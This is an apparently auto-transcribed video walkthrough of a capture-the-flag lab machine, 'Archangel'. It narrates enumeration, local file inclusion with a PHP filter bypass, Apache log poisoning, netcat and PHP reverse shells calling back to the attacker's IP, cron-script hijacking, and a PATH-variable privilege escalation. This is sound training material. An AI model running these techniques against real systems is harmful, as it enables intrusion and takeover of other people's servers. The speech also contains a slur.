we got ourselves a little black box here. We're gonna do a Archangel here, or Archangel, whatever you want to call it. Alright, so we're gonna do that one today. A little black box, and yeah, we'll go from here and we'll see what it's all about. So let's go ahead and very first make a directory. Let's go ahead and make directory. CLE, GEL. There we go. Alright, cool. See, we just got done with the CC pen testing, so let's go ahead and start with an mmap scan. Remember, that's tapping TAC all ports, very verbose, time to 4, 1 above the minimum, or 1 above the default, no DNS lookup, and do not ping. So we see there's a port 80. Let's go ahead and start a GoBuster scan on that immediately. And we'll use 2.3 medium.txt. We'll try with that, and then we can go ahead and throw this guy in there, that IP address. Let's also go ahead and see if there's a virtual host on here. See if that changes at all. See if we even get anywhere with that. See what that is all about. Right there. We do have a pages, flags, layout, images. Let's go ahead and run a NICTO scan that guy. TAC URL. We'll throw HTTP in there. We do see we have flags, things like that. So let's go ahead and check out these pages. Also, we have flag.html. And that's going to be never going to give you up, never going to let you down. Run around. Okay, cool. We got to give us a call here, send us an email, and we have support@mafialive.thm. I wonder if that's something. Let's go ahead and throw mafialive.thm in there. Let's go ahead and do a sudo nano /etc host, and we'll go ahead and we'll throw that in there. And that's going to be under IP address. And we'll see if we get something different also, because we actually get something different with that. So let's go ahead and see if we can go to mafialive.thm. See if it's the same page. Yes, I did. Yes, take me to mafialive.thm. Under development, found the right host name. Okay, so that was something like right there. So there's our first part of it. So let's go ahead and stop this over here. We want to start GoBuster scan for mafialive.thm. So you saw that was pretty quick to find, like right there. We have not yet to get a shell. Find a different host name. mafialive.thm. Oh, I read that first. I probably would have been a lot quicker to find that. Look for a page under development. Yeah, what we're doing like right now. We're doing a GoBuster scan over here. I mean, we can always start with another one. Let's also send a NICTO scan at mafialive.thm. Send NICTO scan at that guy. See if we get anything with that. Apache 2.4.29, which we could have saw also with it if we did mmap TAC SV for version enumeration. Looks like so far we're not getting anywhere else with this guy. I wonder if I should do a different GoBuster scan where we're doing, instead of just mafialive. Well, mafialive, keep with that, but I'm going to go with this page. I'm going to go with all this stuff. Doesn't actually go anywhere, does it? No, it doesn't. Okay. Still under mafialive. I'm going to see if there's like a slash flags over here. Nope. Okay. Slash robots.txt. Which NICTO. Oh, okay. Test.php. So we know we're using PHP now. Okay. Why didn't this guy already pick up on that? I know that common.txt where this would have picked up on that pretty quickly. Let me go ahead and go derby/common.txt. He usually picks up on that pretty quickly. The robots.txt like right there. That's what I usually manually enumerate for though. We got index.html, so we're using PHP and HTML. It's weird. Robots.txt, there's that. There's not seeing anything else in there. Let's go ahead and try for big. Big.txt. And NICTO scan did find that test PHP like right there also. So let's go ahead and check out that test PHP. And test page not to be deployed. Here's a button. We click the button and it tries to go to var to be developed. Okay, so it's actually going to looks like probably local file inclusion, like right there. What do you think? Copy password. Can we do that? Sorry, that's not allowed. Okay, so it knows we're trying to do that. Okay. Here's a button. Let's go ahead and click the button. Controls and illusion. var www.html. MrRobot.php. Can we do something like this? Like command injection or anything like that? No. Okay. What about pipe? No. Okay. Question mark view equals. I wonder if we could do a just like ID like right here. Okay. Sorry, that's not allowed. What is allowed? That is PHP. So I wonder if we can do something with. Let's click the button, then we're going to go ahead and throw that SQL map, see if we get anything with that also. SQL map, tag U, HTTP, tag DB, DBS. Let's try that. Invalid target URL. Oh. Yeah, it's 100% an invalid target. That is correct on that. Oh, sorry. Okay, so let's check DBS. Let's try that. We got head post, get, and options. Might be a little post or something like that with it. Now I'm wondering, you know, like as we're starting to look at this guy. So I feel like we have some type of local file inclusion up there, right? I feel like we may have to do something like PHP wrapper. PHP wrapper payload. Something like this. File inclusion, path traversal, hack tricks, yeah. Maybe something like this. Linux, auto word list, period slash. Okay. Basically, all apply bypasses. We already tried that. We could always try something like this, like right here. See if we can do something like that. Let's try that. Sorry, that's not allowed, okay? Let's go ahead and head back over to here. Bypass the append more characters at the end, provide the string, bypass it. Get parameter, maybe some of that. Might have to encode it. I mean, we'll see. Okay, not allowed. Or if we have to encode it. Checking for folder path. Could be checking for folder path. That's a good point. Went through that whole thing and then go back. Let's try that. Whoopsie daisy. Could be checking for folder path. That is a good point, like right there. So let's go ahead and hit that button. Mr. Robot /PHP/. Maybe it has to be something like this. That's the password like that. Okay, no, it's not checking for that full path. Alright. Oh, because I copied that whole thing, that's why. I just want to copy just this. Nope, okay, sorry, that's not allowed. So this is, I wonder how it's knowing that, what we're trying to do, like what is actually, you know what I'm saying, like what is actually being blocked there. I wonder if we do something like that, question mark cat. Could we do something like that, like instead of just view, could we do cat equals, or like dir? So like, could be like a thing. This is like a 1. Okay. So we're not really getting very far with that guy right there, but look for a page under development. Yeah, it's test.php. Find flag 2. Yeah, that's gonna be a tough one, like right there. Base 64 string convert base 64 encode resource equals index.php. Let's try that, like real quick. Let's see what we're working with here. See if we can do something like this. Let's try and convert it. So PHP filter convert base 64 encode resource equals index.php, and we're not getting that either. Wow. This thing just hates me. Maybe something like this. Oh, I definitely typed in type too. Also, then not view. Sorry, that's not allowed. Really? Oh my god, man, this thing is it just does not like me like right now, does it? Payload, all the things, PHP wrapper. Let's try that. Payload all things. Is this payload all things? Yeah, okay. And file PHP 8. LFI, file inclusion. That's what I look for. Okay, LFI, RFI, wrapper, PHP filter. Let's see what this is. That's the one I just tried, isn't it? Into resource index.php. Or is it index.html? Because we did see index.html in the beginning. Is it that? Is it... Okay. Let's try... or am I trying to test for like test.php? Could also be that too. Let's try something like this. Control V equals var. Okay, at least we didn't get a that's not allowed this time. Let's try for test.php. Test.php. I feel like I should have got something like right there. Button ID secret. Here's a button. Okay. View equals. Let's see here, because we just tried test.php. We're just trying to bring over Mr. Robot.php. We got PHP filter convert base 64 encode resource var www.html development testing Mr. Robot.php. Why don't we do that? Okay, so we got Mr. Robot.php like right here. That's base 64 encoded. Okay, cool. So let's go ahead and do it. Echo into base 64. Decode that. So there was a space at the end there, huh? There's definitely not a space at the beginning though. I don't think there's a space at the end either. PHP echo controls an illusion. Okay. I mean, it definitely does that every single time. We're figuring that out like right there. We know that much. That you're gonna do that every single time. What about, is there a test.php over here? There is. Okay. So we're getting somewhere at least. Let's go ahead and echo. This one is much bigger. Into base 64 tac D. There's that and that. Alright, cool. Now we're actually getting somewhere. Echo, sorry, that's not allowed. Okay, let's see what we got here. Oh, we found our flag 2. Flag 2, explain LFI. LF1, my fault. Sorry, what was I thinking? Got to put in that script kiddie talk like right there. Get a shell and find the user flag. I'm trying my best. Okay. Reference test.php. Here's a button. If asset get view contain string get view previous slash and contain string get view. Sorry, that's not allowed. Okay, so if it has anything with period slash, sorry, that's not allowed. Pretty much. That's what I'm seeing like right here, which I kind of felt like that was the thing. Anything with period slash we couldn't do. What I'm wondering, so anything with period slash like that. So could we do spaces? There's ways to get around this. I already know there's a way to get around this. Can we do period slash? Because we gotta do period slash, period slash, period slash, period slash, period slash, period slash, period slash. Can we do that? No. Why is that not allowed? Like right there. I feel like that should be allowed. Can we do like slash Etsy password? I feel like that should be allowed, like right there. Do we still have to do from like right here slash period slash, let's do space period slash period slash period slash period slash period slash Etsy password. Can we do that? Okay, so then it tells us it wasn't allowed. It's not saying it's not allowed, it's just not giving it to us now. Which doesn't really help me out very much, now does it? What if we just did this Etsy password? So we just do that, like not even like move back to like the directories. Can we just drop Etsy password? No, we cannot. Okay. We're still in test.php. We're not in Mr. Robot.php like right now, are we? So I want to be in Mr. Robot.php and do it like that, right? Maybe I just don't even want to be in a PHP. I need to get rid of the PHP. One second, okay. I feel like that should work like right there. Because I'm following the rules that it gave me. We're trying to still encode it and everything, right? View, test.php view. View, we got our PHP filter, right? It's going to our encode source bar www.html development testing. And now we're trying to drop it with some type of period slash. Maybe I can't do spaces in here? Is that the problem? Maybe I can't put these spaces? These spaces are messing it all up, maybe? It's not understanding like what to do. Okay. Yeah, spaces were messing it all up. Damn me and my spaces. Okay. So let's go in and echo. Now this should be Etsy password right here. Should be Etsy password. It is, because it's Etsy password right here. Okay, cool. So there's www data. Damn, I was kind of hoping that'd be like something sweet. So can I do like some type of like what is it, like reverse shell on here? Or are we gonna do like Apache log poisoning? We're probably gonna do like Apache log poisoning, huh? Okay, so we gotta go to through LFI. Yep. Apache log poisoning through LFI. So we have to go to, should be like log password. Yep, we can get there. We have var log Apache 2, and then access that log. Does that sound correct? Access that log. So we should have to put. Let's see if we can get to it first off. / var log Apache 2 access.log. Let's see if we can even get to it. Let's see what this drops out for us. This is gonna be freaking. Oh, doesn't give me anything. That doesn't. Oh my god. This is gonna be freaking huge. Also, so we got echo that into base 64. Oh god. I think I just broke my terminal. Okay. I mean, I think. Why am I doing a base 64 filter? I don't think I even have to do that anymore. I don't think I have to do a base 64 for this guy right here. I think we can get rid of this whole thing. Delete that. Enter. And I should be able to see it. Okay, cool. So I can see it now. Obviously not the prettiest thing, and we just got no. So okay, calm down. Probably because it's going absolutely insane like right now. So this thing's going absolutely insane. That's okay. We'll probably just use curl here in a second. So I do not have to do this at all down here. Okay. So we're going to do some Apache log poisoning. So now what we need to do is we need to send up the PHP system get command, right? So if I cat my scripts, should be PHP LFI reverse shell.txt, is it? We can count this. No. I mean, I could try that, but scripts PHP command execution address bar. I believe it's this link right here. Yep, and then to curl it in there. So that's what we're going to throw in there, right? So now we're going to do curl, and we're going to throw that Mafia live in there, right? And then tac A, and then the command, right? So we'll do curl HTTP Mafia live.thm tac A. Then we're going to throw this in there. And that should put a git command, or I should be able to type in command, question mark, and then put in a command. That's what it should be able to do. Okay, so, and then with put, so I was saying that, we have put on one of them, right? Head, get, post, option. Okay, I don't have put, never mind, okay. THM, oh, okay. Oh, okay, I found the right host name. Alright, cool. Yeah, we already did that, okay. So then we can do a, let's see here, so curl tac S, and we can do, well, this is a netcat tac E reverse shell, bin bash, back to myself, it looks like netcat, to my IP address, it looks like tac E bin bash. Or if we can do that, like right there, if we could just do something like real quick like that, that would be pretty sweet, and just get a reverse shell like that. We could always try it. So let's go ahead and try a reverse shell on, looks like I did port 443 on that one, and C tac LVMP 443. We can go ahead and stop this up here. Let's go ahead and clear this out. Let's go ahead and do an ifconfig, get my IP address, and we're just going to go ahead. I'm just going to copy this thing from here. We'll do a curl tac S HTTP. I want to get to, yeah, that view. Yeah, I want to be. I think I want to be like here. View equals, right? Then we can get rid of this probably right here, right? I want to be here, but I don't want it to be etsy password. I want it to be var log apache 2 access dot log. So we can actually just grab this up right here, and we'll go ahead and throw him in here. And instead of etsy password, we're going to do, and we're also going to hopefully that works right there. Okay. / var log apache 2 access.log and command equals, all right, netcat %20 set to space, my IP address, netcat back to me, right, %20 set space 443, right, that's what port I'm listing on, %20 space again, tac E %20 / bin bash, that %20 and sign for some reason, so I did %20, then I did and, Don't know why we did that. I'm going to try to throw this in there. I have no idea if it's going to work or not. I'm going to try it. See what happens here. See if I get anything back. And it doesn't really look like I get anything back, huh? Okay, that's okay. We don't know if the git command even works yet. I'm just throwing stuff on there like right now, seeing you know, if we could run anything with it. So that's okay. That is okay. So we should just be able to generate a reverse shell then. Like it may not have netcats actually on here, in all honesty. But we should be able to generate a reverse shell with like a PHP file, you know. So we should be able to do a reverse shell like that. Now what I'm wondering is if we can do a, let me just copy over from not privilege escalation, pentest monkey reverse shell. Let's move PHP reverse shell to shell.php, nano shell.php, change the IP address 10.13.26.184. And wonder if we can put that in there. Okay. From there we can do a I think we can do this curl command to be able to put it into there, right? Like that's what we have to do after that, right? Like a wget, right? Where would we put that wget? Where do we do that? Like right there. We have to. We should be able to just do a regular wget in here. Should. So if we do a Python 3 server, right? There's that. And then if we do the get command, right? So THM command equals. That's not gonna work. No. Okay. How the hell are we gonna do this project right here? How the hell are we gonna get this? Oh God, how do I do this? I've done this before too. That's what we put. That's to make the callback right there. Where did I actually put that? One guy. No, that was in mafia.thm. And we have like right here mafia.thm. There shouldn't be that guy right there. It should be question mark command equals. That didn't work out at all for us. Okay. It shouldn't really be that difficult. Why am I doing question mark command equals? We should be able to do. Why do I keep doing? Oh, why am I'm being fucking retarded right now, aren't I? Okay. I'm being absolutely retarded right now for some reason. Going full retard mode. So we can get it to the Apache access file, right? We can put the PHP in there, right? Is it going to be in the log file? How long does wget just so I can see if I get any. Ooh, he pulled it from back over here. So we just put shell.php on there. So shell.php is now on that system. Okay. So we are definitely making a call back to ourselves. Okay, so now let's go ahead and do that mafialive.thm. Okay. Slash shell.php. Netcat tag lvmp 444. Shell.php. Because he should have just brought right into there. And we get a callback. There we go. Okay, cool. ID lsec.la, cd into home, I guess, or cd into var www, cd in HTML, cd into Mafia Live, cd into flags, cat flag.html. Doesn't really sound right. Yeah, just a video, cd.back, cd.back, cd into development testing. So I'm trying to find the other thing that I want me to find now, because it says, hey, there's get a shell and find the user flag. Okay, user flag. So let's go ahead and cd into /home. Let's also figure out which Python is on here, right? And which Python 3. Okay, cool. So let's go ahead and catch scripts full shell. We'll do Python 3, right? That's escaping rbash. And we'll make a full shell so then Z can be happy, okay? Alright, so from here, press Control Z. STTY, TAC A. Okay, note the number of rows and columns, 18 and 85. Okay, STTY, raw echo foreground, enter. Okay, export term equals xterm, STTY rows, and it was 18, columns 85. There we go. Now we should be able to cd into Archangel, and now we have more of like a regular terminal where you can tab and things like that to it. Cat user.text, and I mean it's tricky, but I spent much longer on it than what I should have. Now we have to root the machine, okay? So we have get user 2 flag, and then root the machine find the root flag. There's a user 2. cd into my files, I don't know. Probably secret also. Password backup, cat password backup. So I could read that. That's going to be same exact thing. Secret. Cat password backup. Same exact thing. Okay. Sudo tech out. We don't know his password, but I mean, let's try. Okay. Let's see here. Where can we cd into var whtml, cd into development testing. We already checked out Mr. Robot, so we got shell and test.php, cat test.php. I think we already looked at this also, didn't we? Yes, we did. And we already looked at the Mr. Robot one. We didn't have anything in there. LA. Let's go ahead and cd into Mafia Live. We should also probably look at our SUID layout pages, cd into pages. Okay. License is spelled wrong. Also cd into op. Sometimes people like to throw stuff into op. Backup files, helloworld.sh. See, people like to cd into backup files. Can I do that? Permission denied. Okay. Let's go and cat helloworld.sh, and I do have executable and write and read permissions on there. So echo hello world op backup files hello world.txt. Okay, and there's no hello world.txt. This is being ran by Archangel. So can I run that? Permission denied. Alright. Permission denied. What's this? Okay. Can we echo something else in there? Echo hi into hello world. Can we append it? We can. Running cat hello world.sh, and that's probably running. If we do a let's go ahead and look at my cat scripts cron job lookup. Okay, we can cat our cron tab, see if that is doing anything. See if we're running anything in there, because I feel like that's gonna be, yep, Archangel is running opt hello world every minute. So let's go ahead and create a reverse shell with that guy right there. Okay, let's go ahead and start a listener up and create a reverse shell. Can we do a with netcat? So we do a bin netcat. Bash. Can we do a bash reverse shell? So let's go ahead and cat scripts bash reverse shell. Go ahead and grab this guy and throw him down here because we're going to do an IP real quick, right? Look at my IP address. So let's go ahead and throw that bash reverse shell in there under port 9999. Sure, why not? Let's go ahead and copy him down. And we will do a echo him. And we can append him into there, hello world.sh. And now what I should technically be able to do is NC, I'll actually do it over here, NC tech LVMP 999. Right, and what I should be able to do is actually run that and see if it actually works for me. It does. Okay, so it does actually work for me. Okay, cool. So we can go ahead and stop that now. Let's exit out of there. Start that back up again. So we do know that that reverse shell does work. So that's what I like to do. I always like to test them beforehand. We do know it does work, which is always a good thing that we know that works. And now we're just wait. We're just kind of waiting a minute for that cron job to run as Archangel, whatever you want to call it, and yeah, then that guy will shoot back into there, and we will have a nice little reverse shell in there. At least we should have a nice little reverse shell in there. Should. Okay, and we do. And we have Archangel. Okay, so let's go ahead and LSX LA. Who am I? All right, cool. Does he have an SSH or anything like that? He does not. Okay, so ID, and he's in group 1001. Sudo tech L. See if we can do it without a password. Okay, he cannot. Let's see what his cat scripts SUID lookup. Let's see what his SUID is. Maybe. Hopefully. See if we can run anything like this. And he can run home, Archangel secret backup. Let's cd into /home. Cd into back secret. He can run backup. So let's go ahead and backup from running his root. There's user2.txt. Let's go and cat user2.txt. What if I was in Docker up there? Okay, cool. And now we can run. So let's go ahead and cat that backup. See what this guy's running. Oh, Jesus Christ. Okay, let's go ahead and period. Or actually, go ahead and do a. Yeah, please run backup. And backup not found. Period / backup. Let me look at those SUID bits again. I'm not gonna be able to do it like that, am I? Home, can I run it like that? Can I run that? Home user, Archangel, my files, start. It says file directory, cannot stat. So it looks like it's trying to copy something from there to go do something with that guy like right there. So I'm wondering if we can just make that file. I don't know. And I wonder if we can just make that file. whole user opening my file /star. That's what's. What if we do that one thing where we do like we make like a GCC file or whatever, where we do something like that, and then we get it from there, and we can like change it, like set the UID and all that stuff. What if we need to do something like that? Can we do like a strings for it? Set UID. Okay. And what if we do something like that though, where we have to actually like do like the, where we need to pretty much make like another one, you know what I'm saying? Because we've done that one before, the path traversal stuff, you know, if we have to do something like that, where we have to actually do some type of path traversal. But there's a set UID bit, right? And he's saying that he can't do anything with home user Archangel my file star. And he's copying it. Oh, he's copying it to backup files. What the hell? Can we, on that copy right there, right? Can we do something where we can we do something where we make CP? Because that might not realize to actually copy. This ain't CP. So, and if it's not able to find anything in there, maybe you lost. It's saying it's unable to do that, right? This, I feel like I've done these before, things like this. So I've definitely done stuff like this before. And what if we can just copy it over? Use like copy or something like that and just run it like that, where we can just do some type of like okay. Now let's go ahead and do a TD $sign. Is it? It's make temp, right? Make temp tac D $sign make temp tac D, like that. All right. Cool. Okay. And then we're gonna echo bin sh into TD copy, right? So we're gonna echo bin bash into echo that into TD / copy, right? Something like that, okay? Is that correct? Someone in chat. I'm asking if that's correct. There's no one else actually watching, so I don't know if that's correct. No such file directory. Well, bin sh. I wonder if it's also going to do bin bash like that too. Damn it. Damn it again. That's what I want to do, like right there. Never gonna give you up. Alright. After that, we're going to change mode. We're going to export the path. We should be able to go do it like that from there. So let's go ahead and copy him. CP. Process file directory. I have to make the directory CP? Right? Make temp tag D, right? Okay, so that works. Then from there we should just be able to echo. Let's try bin sh into I don't think I actually have a directory for copy, do I? There we go. Okay. $TD. Yep. Okay. Then from there, we're going to change the mode A and X. A plus X. I can do it like that, right? Plus A plus X, and then just keep going like that. Or is it like A plus X? And we're going to do that for TD copy, which would be $TD. Copy. Alright, cool. From here we got to export our path into TD, that path. So export path. My wife would just yell at me except for my hoodie and my mouth. Equals TD path. Or is it $TD path? $TD path. $TD, $path. Okay, cool. And from here, it's just a quick secret backup. There we go. Okay, cool. So let's go on CD in a root. And cat root.txt. Alright, yeah. Path variable exploitation is correct. What was the hint? Well, what was the hint? Please, give me something here. I can't look at the hint anymore, can I? Certain passive dangers. I know it's that from the beginning because of the star on it. Alright, cool. So that one was fun. Especially after CC pen testing. That was actually pretty rough. But I had a good time doing it. Hopefully you guys learned something. I definitely learned something. As usual, I always do. But yeah, thanks a lot. Thanks a lot for people that stayed stuck around and everything. And yeah, you guys have a good one. Alright, I will talk to everyone later.